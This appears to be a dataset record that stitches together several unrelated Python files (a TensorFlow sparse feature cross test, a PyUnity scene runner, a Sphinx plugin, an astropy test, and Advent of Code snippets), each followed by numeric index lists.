b = self.b
t = self.t
g = csr_matrix(
(t, (a, b)),
shape=(n, n),
)
dist = floyd_warshall(
csgraph=g,
directed=False,
)
self.dist = dist
def main():
t = 1
# t = StdReader().int()
for _ in range(t):
Problem()()
if __name__ == "__main__":
main()
| [
[
[
23,
34
]
],
[
[
55,
64
],
[
266,
275
],
[
325,
334
],
[
460,
469
]
],
[
[
66,
74
],
[
135,
143
]
],
[
[
83,
92
],
[
1064,
1073
]
],
[
[
977,
980
],
[
1012,
1015
]
],
[
[
982,
996
],
[
1166,
1180
],
[
1222,
1236
]
],
[
[
1005,
1011
],
[
1396,
1402
]
],
[
[
1279,
1290
],
[
1570,
1572
]
],
[
[
1316,
1326
],
[
2008,
2018
]
],
[
[
1360,
1374
],
[
2096,
2110
]
],
[
[
1383,
1390
],
[
2281,
2288
]
],
[
[
2204,
2208
],
[
2326,
2330
]
]
] |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Tests for the astropylibrarian.reducers.utils module.
"""
from __future__ import annotations
from typing import TYPE_CHECKING
from astropylibrarian.reducers.utils import iter_sphinx_sections
if TYPE_CHECKING:
from .conftest import HtmlTestData
def test_iter_sphinx_sections(color_excess_tutorial: HtmlTestData) -> None:
"""Test the iter_sphinx_sections algorithm using the color-excess.html
notebook tutorial example.
This example is made complicated by the fact that the heading levels are
not strictly hierarchical. There are multiple "h1" tags.
"""
doc = color_excess_tutorial.parse()
root = doc.cssselect(".card .section")[0]
sections = []
for s in iter_sphinx_sections(
root_section=root,
base_url=color_excess_tutorial.url,
headers=[],
header_callback=lambda x: x.rstrip("¶"),
content_callback=lambda x: x.strip(),
):
sections.append(s)
assert len(sections) == 5
assert sections[0].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Learning Goals",
]
assert sections[0].header_level == 2
assert sections[0].url == (
"http://learn.astropy.org/rst-tutorials/color-excess.html"
"#learning-goals"
)
assert sections[0].content.startswith(
"Investigate extinction curve shapes"
)
assert sections[1].headings[-1] == "Keywords"
assert sections[1].header_level == 2
assert sections[1].content.startswith(
"dust extinction, synphot, astroquery, units, photometry, extinction,"
)
assert sections[2].headings[-1] == "Companion Content"
assert sections[2].header_level == 2
assert sections[2].content.startswith("Bessell & Murphy")
assert sections[3].headings[-1] == "Summary"
assert sections[3].header_level == 2
assert sections[3].content.startswith(
"In this tutorial, we will look at some extinction curves from the"
)
assert sections[4].headings[-1] == (
"Analyzing interstellar reddening and calculating synthetic "
"photometry"
)
assert sections[4].header_level == 1
# Demonstrate finding addition h1 sections on a page (that are supposed
# to be additional h2 sections in a hierarchical sense).
h1_heading = sections[-1].headings[-1]
for sibling in root.itersiblings(tag="div"):
if "section" in sibling.classes:
for s in iter_sphinx_sections(
root_section=sibling,
base_url=color_excess_tutorial.url,
headers=[h1_heading],
header_callback=lambda x: x.rstrip("¶"),
content_callback=lambda x: x.strip(),
):
sections.append(s)
assert sections[5].header_level == 2
assert sections[5].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Introduction",
]
assert sections[6].header_level == 2
assert sections[6].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 1: Investigate Extinction Models",
]
assert sections[7].header_level == 2
assert sections[7].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 2: Deredden a Spectrum",
]
assert sections[8].header_level == 3
assert sections[8].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 3: Calculate Color Excess with synphot",
"Exercise",
]
assert sections[9].header_level == 2
assert sections[9].headings == [
"Analyzing interstellar reddening and calculating synthetic "
"photometry",
"Example 3: Calculate Color Excess with synphot",
]
| [
[
[
149,
160
]
],
[
[
181,
194
],
[
265,
278
]
],
[
[
240,
260
],
[
768,
788
],
[
2541,
2561
]
],
[
[
306,
318
],
[
374,
386
]
],
[
[
325,
350
]
]
] |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.layers.sparse_feature_cross."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy
from tensorflow.contrib import layers
from tensorflow.contrib.layers.python.ops import sparse_feature_cross_op
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import sparse_ops
from tensorflow.python.platform import test
class SparseCrossOpTest(test.TestCase):
def test_simple(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1'],
['batch2-FC1-F1', 'batch2-FC1-F2']]),
self._sparse_tensor([['batch1-FC2-F1'],
['batch2-FC2-F1', 'batch2-FC2-F2']])
])
expected_out = self._sparse_tensor([['batch1-FC1-F1_X_batch1-FC2-F1'], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_dense(self):
"""Tests only dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
constant_op.constant([['batch1-FC1-F1', 'batch1-FC1-F2'],
['batch2-FC1-F1', 'batch2-FC1-F2']],
dtypes.string),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1', 'batch1-FC1-F1_X_batch1-FC2-F2',
'batch1-FC1-F2_X_batch1-FC2-F1', 'batch1-FC1-F2_X_batch1-FC2-F2'
], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_mixed_string_sparse(self):
"""Tests mixed type."""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([[11], [333, 55555]]),
self._sparse_tensor([['batch1-FC2-F1'],
['batch2-FC2-F1', 'batch2-FC2-F2']])
])
expected_out = self._sparse_tensor([['11_X_batch1-FC2-F1'], [
'333_X_batch2-FC2-F1', '333_X_batch2-FC2-F2', '55555_X_batch2-FC2-F1',
'55555_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_mixed_string_dense(self):
"""Tests mixed dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
constant_op.constant([[11, 333], [55555, 999999]], dtypes.int64),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor([[
'11_X_batch1-FC2-F1', '11_X_batch1-FC2-F2', '333_X_batch1-FC2-F1',
'333_X_batch1-FC2-F2'
], [
'55555_X_batch2-FC2-F1', '55555_X_batch2-FC2-F2',
'999999_X_batch2-FC2-F1', '999999_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_sparse_cross_dense(self):
"""Tests sparse and dense inputs.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1'],
['batch2-FC1-F1', 'batch2-FC1-F2']]),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor(
[['batch1-FC1-F1_X_batch1-FC2-F1', 'batch1-FC1-F1_X_batch1-FC2-F2'], [
'batch2-FC1-F1_X_batch2-FC2-F1', 'batch2-FC1-F1_X_batch2-FC2-F2',
'batch2-FC1-F2_X_batch2-FC2-F1', 'batch2-FC1-F2_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_integer_sparse_input(self):
"""Tests mixed type sparse and dense inputs."""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([[11], [333, 5555]]),
constant_op.constant([['batch1-FC2-F1', 'batch1-FC2-F2'],
['batch2-FC2-F1', 'batch2-FC2-F2']],
dtypes.string),
])
expected_out = self._sparse_tensor(
[['11_X_batch1-FC2-F1', '11_X_batch1-FC2-F2'], [
'333_X_batch2-FC2-F1', '333_X_batch2-FC2-F2',
'5555_X_batch2-FC2-F1', '5555_X_batch2-FC2-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_permutation_3x3x3(self):
"""Tests 3x3x3 permutation.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor(
[['batch1-FC2-F1', 'batch1-FC2-F2', 'batch1-FC2-F3']]),
self._sparse_tensor(
[['batch1-FC3-F1', 'batch1-FC3-F2', 'batch1-FC3-F3']])
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F1_X_batch1-FC2-F3_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F3_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F2_X_batch1-FC3-F3',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F3_X_batch1-FC3-F3'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_permutation_3x1x2(self):
"""Tests 3x1x2 permutation.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F3_X_batch1-FC2-F1_X_batch1-FC3-F2'
]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_large_batch(self):
"""Tests with large batch size to force multithreding.
"""
batch_size = 5000
col1 = []
col2 = []
col3 = []
for b in range(batch_size):
col1.append(
['batch%d-FC1-F1' % b, 'batch%d-FC1-F2' % b, 'batch%d-FC1-F3' % b])
col2.append(['batch%d-FC2-F1' % b])
col3.append(['batch%d-FC3-F1' % b, 'batch%d-FC3-F2' % b])
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor(col1), self._sparse_tensor(col2),
self._sparse_tensor(col3)
])
col_out = []
for b in range(batch_size):
col_out.append([
'batch%d-FC1-F1_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F1_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b),
'batch%d-FC1-F2_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F2_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b),
'batch%d-FC1-F3_X_batch%d-FC2-F1_X_batch%d-FC3-F1' % (b, b, b),
'batch%d-FC1-F3_X_batch%d-FC2-F1_X_batch%d-FC3-F2' % (b, b, b)
])
expected_out = self._sparse_tensor(col_out)
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_one_column_empty(self):
"""Tests when one column is empty.
The crossed tensor should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1', 'batch1-FC1-F2']]),
self._sparse_tensor([], 1),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
])
with self.test_session() as sess:
self._assert_sparse_tensor_empty(sess.run(op))
def test_some_columns_empty(self):
"""Tests when more than one columns are empty.
Cross for the corresponding batch should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([['batch1-FC1-F1', 'batch1-FC1-F2']], 2),
self._sparse_tensor([['batch1-FC2-F1'], ['batch2-FC2-F1']], 2),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']], 2)
])
expected_out = self._sparse_tensor([[
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F1_X_batch1-FC2-F1_X_batch1-FC3-F2',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F1',
'batch1-FC1-F2_X_batch1-FC2-F1_X_batch1-FC3-F2'
]], 2)
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_all_columns_empty(self):
"""Tests when all columns are empty.
The crossed tensor should be empty.
"""
op = sparse_feature_cross_op.sparse_feature_cross([
self._sparse_tensor([]), self._sparse_tensor([]),
self._sparse_tensor([])
])
with self.test_session() as sess:
self._assert_sparse_tensor_empty(sess.run(op))
def test_hashed_output_zero_bucket(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[3735511728867393167]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_zero_bucket_v2(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[1971693436396284976]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
# TODO(sibyl-Aix6ihai): Add benchmark to compare Hashed vs Non-hashed.
def test_hashed_output(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
num_buckets=100)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[74]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_v2(self):
"""Tests a simple scenario.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor([['batch1-FC1-F1']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1']])
],
hashed_output=True,
num_buckets=100,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
# Check actual hashed output to prevent unintentional hashing changes.
expected_out = self._sparse_tensor([[83]])
with self.test_session() as sess:
self._assert_sparse_tensor_equals(expected_out, sess.run(op))
def test_hashed_output_v1_has_collision(self):
"""Tests the old version of the fingerprint concatenation has collisions.
"""
# The last 10 bits of 359 and 1024+359 are identical.
# As a result, all the crosses collide.
t1 = constant_op.constant([[359], [359 + 1024]])
t2 = constant_op.constant([list(range(10)), list(range(10))])
cross = sparse_feature_cross_op.sparse_feature_cross(
[t2, t1], hashed_output=True, num_buckets=1024)
cross_dense = sparse_ops.sparse_tensor_to_dense(cross)
with session.Session():
values = cross_dense.eval()
self.assertTrue(numpy.equal(values[0], values[1]).all())
def test_hashed_output_v2_has_no_collision(self):
"""Tests the new version of the fingerprint concatenation has no collisions.
"""
# Although the last 10 bits of 359 and 1024+359 are identical.
# As a result, all the crosses shouldn't collide.
t1 = constant_op.constant([[359], [359 + 1024]])
t2 = constant_op.constant([list(range(10)), list(range(10))])
cross = sparse_feature_cross_op.sparse_feature_cross(
[t2, t1],
hashed_output=True,
num_buckets=1024,
hash_key=layers.SPARSE_FEATURE_CROSS_DEFAULT_HASH_KEY)
cross_dense = sparse_ops.sparse_tensor_to_dense(cross)
with session.Session():
values = cross_dense.eval()
self.assertTrue(numpy.not_equal(values[0], values[1]).all())
def test_hashed_3x1x2(self):
"""Tests 3x1x2 permutation with hashed output.
"""
op = sparse_feature_cross_op.sparse_feature_cross(
[
self._sparse_tensor(
[['batch1-FC1-F1', 'batch1-FC1-F2', 'batch1-FC1-F3']]),
self._sparse_tensor([['batch1-FC2-F1']]),
self._sparse_tensor([['batch1-FC3-F1', 'batch1-FC3-F2']])
],
hashed_output=True,
num_buckets=1000)
with self.test_session() as sess:
out = sess.run(op)
self.assertEqual(6, len(out.values))
self.assertAllEqual([[0, i] for i in range(6)], out.indices)
self.assertTrue(all(x < 1000 and x >= 0 for x in out.values))
all_values_are_different = len(out.values) == len(set(out.values))
self.assertTrue(all_values_are_different)
def _assert_sparse_tensor_empty(self, sp):
self.assertEquals(0, sp.indices.size)
self.assertEquals(0, sp.values.size)
# TODO(zakaria): check if we can ignore the first dim of the shape.
self.assertEquals(0, sp.dense_shape[1])
def _assert_sparse_tensor_equals(self, sp1, sp2):
self.assertAllEqual(sp1.indices.eval(), sp2.indices)
self.assertAllEqual(sp1.values.eval(), sp2.values)
self.assertAllEqual(sp1.dense_shape.eval(), sp2.dense_shape)
def _sparse_tensor(self, data, batch_size=-1):
"""Generates a SparseTensor.
Args:
data: Should be a list of list of strings or int64. Each item of the outer
list represents a batch. Each item of the batch is a feature of a
specific feature column.
batch_size: optional batch size, especially for cases when data has no
entry for some batches.
Returns:
A SparseTensor.
"""
indices = []
values = []
max_col_count = 0
for batch, batch_ix in zip(data, range(len(data))):
for column, column_ix in zip(batch, range(len(batch))):
indices.append([batch_ix, column_ix])
values.append(column)
max_col_count = max(max_col_count, column_ix + 1)
shape = [batch_size if batch_size != -1 else len(data), max_col_count]
value_type = (dtypes.string if not values or isinstance(values[0], str) else
dtypes.int64)
return sparse_tensor.SparseTensor(
constant_op.constant(indices, dtypes.int64, [len(indices), 2]),
constant_op.constant(values, value_type, [len(indices)]),
constant_op.constant(shape, dtypes.int64))
if __name__ == '__main__':
test.main()
| [
[
[
769,
784
]
],
[
[
808,
816
]
],
[
[
840,
854
]
],
[
[
863,
868
],
[
14912,
14917
],
[
15671,
15676
]
],
[
[
901,
907
],
[
12686,
12692
],
[
14024,
14030
],
[
15482,
15488
]
],
[
[
957,
980
],
[
1385,
1408
],
[
2080,
2103
],
[
3033,
3056
],
[
3639,
3662
],
[
4425,
4448
],
[
5265,
5288
],
[
5965,
5988
],
[
8089,
8112
],
[
9260,
9283
],
[
10223,
10246
],
[
10699,
10722
],
[
11486,
11509
],
[
11815,
11838
],
[
12413,
12436
],
[
13132,
13155
],
[
13726,
13749
],
[
14667,
14690
],
[
15347,
15370
],
[
15816,
15839
]
],
[
[
1018,
1025
],
[
14837,
14844
],
[
15596,
15603
]
],
[
[
1066,
1077
],
[
2135,
2146
],
[
2313,
2324
],
[
3694,
3705
],
[
3768,
3779
],
[
4595,
4606
],
[
5370,
5381
],
[
14545,
14556
],
[
14598,
14609
],
[
15225,
15236
],
[
15278,
15289
],
[
17985,
17996
],
[
18057,
18068
],
[
18123,
18134
]
],
[
[
1118,
1124
],
[
2289,
2295
],
[
2467,
2473
],
[
3745,
3751
],
[
3922,
3928
],
[
4749,
4755
],
[
5524,
5530
],
[
17843,
17849
],
[
17924,
17930
],
[
18015,
18021
],
[
18151,
18157
]
],
[
[
1165,
1178
],
[
17949,
17962
]
],
[
[
1213,
1223
],
[
14787,
14797
],
[
15546,
15556
]
],
[
[
1263,
1267
],
[
1294,
1298
],
[
18197,
18201
]
],
[
[
1276,
1293
]
]
] |
__all__ = ["ChangeScene", "Runner", "WindowRunner", "NonInteractiveRunner", "newRunner"]
from .. import config, render, Logger
from ..events import EventLoopManager, WaitForUpdate, WaitForFixedUpdate, WaitForRender
from ..errors import PyUnityException
import copy
import os
class ChangeScene(Exception):
pass
class Runner:
def __init__(self):
self.scene = None
self.next = None
self.opened = False
def setScene(self, scene):
if self.opened:
raise PyUnityException("Cannot set scene after opening runner")
self.scene = copy.deepcopy(scene)
def setNext(self, scene):
if self.scene is None:
raise PyUnityException("Cannot set next before first scene")
self.next = copy.deepcopy(scene)
raise ChangeScene
def open(self):
if self.scene is None:
raise PyUnityException("Cannot open runner before setting a scene")
if self.opened:
Logger.Save()
self.opened = True
def setup(self):
pass
def load(self):
if self.scene is None:
raise PyUnityException("Cannot load runner before setting a scene")
Logger.LogLine(Logger.DEBUG, "Starting scene")
self.eventLoopManager = EventLoopManager()
self.eventLoopManager.schedule(self.scene.updateFixed, ups=50, waitFor=WaitForFixedUpdate)
self.eventLoopManager.addLoop(self.scene.startScripts())
def start(self):
while True:
try:
self.eventLoopManager.start()
break
except ChangeScene:
if self.next is None:
raise
self.eventLoopManager.quit()
self.scene.cleanUp()
self.scene = self.next
self.next = None
self.load()
def quit(self):
self.eventLoopManager.quit()
self.scene.cleanUp()
self.scene = None
self.opened = False
class WindowRunner(Runner):
def open(self):
super(WindowRunner, self).open()
os.environ["PYUNITY_GL_CONTEXT"] = "1"
self.window = config.windowProvider(self.scene.name)
# front buffer
self.window.refresh()
render.fillScreen()
# back buffer
self.window.refresh()
render.fillScreen()
def setup(self):
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
Logger.LogLine(Logger.DEBUG, "Compiling objects")
Logger.LogLine(Logger.INFO, "Compiling shaders")
render.compileShaders()
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
Logger.LogLine(Logger.INFO, "Loading skyboxes")
render.compileSkyboxes()
Logger.LogSpecial(Logger.INFO, Logger.ELAPSED_TIME)
def load(self):
super(WindowRunner, self).load()
self.eventLoopManager.schedule(
self.scene.updateScripts, self.window.updateFunc,
ups=config.fps, waitFor=WaitForUpdate)
self.eventLoopManager.schedule(
self.window.refresh, self.scene.Render,
main=True, waitFor=WaitForRender)
if self.scene.mainCamera is not None:
self.window.setResize(self.scene.mainCamera.Resize)
self.scene.startOpenGL()
self.scene.startLoop()
def start(self):
super(WindowRunner, self).start()
def quit(self):
super(WindowRunner, self).quit()
del self.window
del os.environ["PYUNITY_GL_CONTEXT"]
render.resetShaders()
Logger.LogLine(Logger.INFO, "Reset shaders")
render.resetSkyboxes()
Logger.LogLine(Logger.INFO, "Reset skyboxes")
class NonInteractiveRunner(Runner):
def load(self):
super(NonInteractiveRunner, self).load()
self.eventLoopManager.schedule(
self.scene.updateScripts,
ups=config.fps, waitFor=WaitForUpdate)
self.scene.startLoop()
def newRunner():
if os.environ["PYUNITY_INTERACTIVE"] == "1":
return WindowRunner()
else:
return NonInteractiveRunner()
| [
[
[
0,
7
]
],
[
[
105,
111
],
[
2163,
2169
],
[
2983,
2989
],
[
3894,
3900
]
],
[
[
113,
119
],
[
2263,
2269
],
[
2343,
2349
],
[
2569,
2575
],
[
2718,
2724
],
[
3534,
3540
],
[
3617,
3623
]
],
[
[
121,
127
],
[
978,
984
],
[
1194,
1200
],
[
1209,
1215
],
[
2393,
2399
],
[
2411,
2417
],
[
2424,
2430
],
[
2453,
2459
],
[
2468,
2474
],
[
2512,
2518
],
[
2527,
2533
],
[
2601,
2607
],
[
2619,
2625
],
[
2632,
2638
],
[
2662,
2668
],
[
2677,
2683
],
[
2751,
2757
],
[
2769,
2775
],
[
2782,
2788
],
[
3564,
3570
],
[
3579,
3585
],
[
3648,
3654
],
[
3663,
3669
]
],
[
[
149,
165
],
[
1273,
1289
]
],
[
[
167,
180
],
[
3003,
3016
],
[
3914,
3927
]
],
[
[
182,
200
],
[
1371,
1389
]
],
[
[
202,
215
],
[
3141,
3154
]
],
[
[
237,
253
],
[
508,
524
],
[
688,
704
],
[
880,
896
],
[
1124,
1140
]
],
[
[
261,
265
],
[
587,
591
],
[
763,
767
]
],
[
[
273,
275
],
[
2101,
2103
],
[
3493,
3495
],
[
3985,
3987
]
],
[
[
283,
294
],
[
798,
809
],
[
1602,
1613
]
],
[
[
323,
329
],
[
2023,
2029
],
[
3722,
3728
]
],
[
[
2010,
2022
],
[
2066,
2078
],
[
2838,
2850
],
[
3366,
3378
],
[
3429,
3441
],
[
4042,
4054
]
],
[
[
3701,
3721
],
[
3765,
3785
],
[
4082,
4102
]
],
[
[
3965,
3974
]
]
] |
"""
Sphinx plugins for RapidSMS documentation.
"""
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
try:
from django.utils import simplejson as json
except ImportError:
json = None
from sphinx import addnodes, roles
from docutils.parsers.rst import Directive
def setup(app):
app.add_crossref_type(
directivename = "setting",
rolename = "setting",
indextemplate = "pair: %s; setting",
)
app.add_crossref_type(
directivename = "templatetag",
rolename = "ttag",
indextemplate = "pair: %s; template tag"
)
app.add_crossref_type(
directivename = "templatefilter",
rolename = "tfilter",
indextemplate = "pair: %s; template filter"
)
app.add_crossref_type(
directivename = "router",
rolename = "router",
indextemplate = "pair: %s; router",
)
app.add_config_value('rapidsms_next_version', '0.0', True)
app.add_directive('versionadded', VersionDirective)
app.add_directive('versionchanged', VersionDirective)
class VersionDirective(Directive):
has_content = True
required_arguments = 1
optional_arguments = 1
final_argument_whitespace = True
option_spec = {}
def run(self):
env = self.state.document.settings.env
arg0 = self.arguments[0]
is_nextversion = env.config.rapidsms_next_version == arg0
ret = []
node = addnodes.versionmodified()
ret.append(node)
if not is_nextversion:
if len(self.arguments) == 1:
linktext = 'Please, see the release notes </releases/%s>' % (arg0)
xrefs = roles.XRefRole()('doc', linktext, linktext,
self.lineno, self.state)
node.extend(xrefs[0])
node['version'] = arg0
else:
node['version'] = "Development version"
node['type'] = self.name
if len(self.arguments) == 2:
inodes, messages = self.state.inline_text(self.arguments[1],
self.lineno+1)
node.extend(inodes)
if self.content:
self.state.nested_parse(self.content, self.content_offset,
node)
ret = ret + messages
env.note_versionchange(node['type'], node['version'], node,
self.lineno)
return ret
| [
[
[
68,
72
]
],
[
[
117,
135
]
],
[
[
210,
228
]
],
[
[
269,
273
]
],
[
[
301,
309
],
[
1533,
1541
]
],
[
[
311,
316
],
[
1764,
1769
]
],
[
[
350,
359
],
[
1188,
1197
]
],
[
[
366,
371
]
],
[
[
1171,
1187
],
[
1087,
1103
],
[
1145,
1161
]
]
] |
#!/usr/bin/env python3
# pylint: disable=unused-import
import collections
import functools
import io
import itertools
import operator as op
import re
import timeit
import numpy as np
import aocd
YEAR = 2021
DAY = 11
def step(grid):
grid += 1
flash = np.zeros_like(grid, dtype=bool)
while np.any(grid[~flash] > 9):
new_flash = (grid > 9) ^ flash
grid[:-1, :-1] += new_flash[1:, 1:]
grid[:-1, :] += new_flash[1:, :]
grid[:-1, 1:] += new_flash[1:, :-1]
grid[:, :-1] += new_flash[:, 1:]
grid[:, 1:] += new_flash[:, :-1]
grid[1:, :-1] += new_flash[:-1, 1:]
grid[1:, :] += new_flash[:-1, :]
grid[1:, 1:] += new_flash[:-1, :-1]
flash |= new_flash
grid[flash] = 0
return flash
def main():
data = """5483143223
2745854711
5264556173
6141336146
6357385478
4167524645
2176841721
6882881134
4846848554
5283751526"""
data = aocd.get_data(day=DAY, year=YEAR)
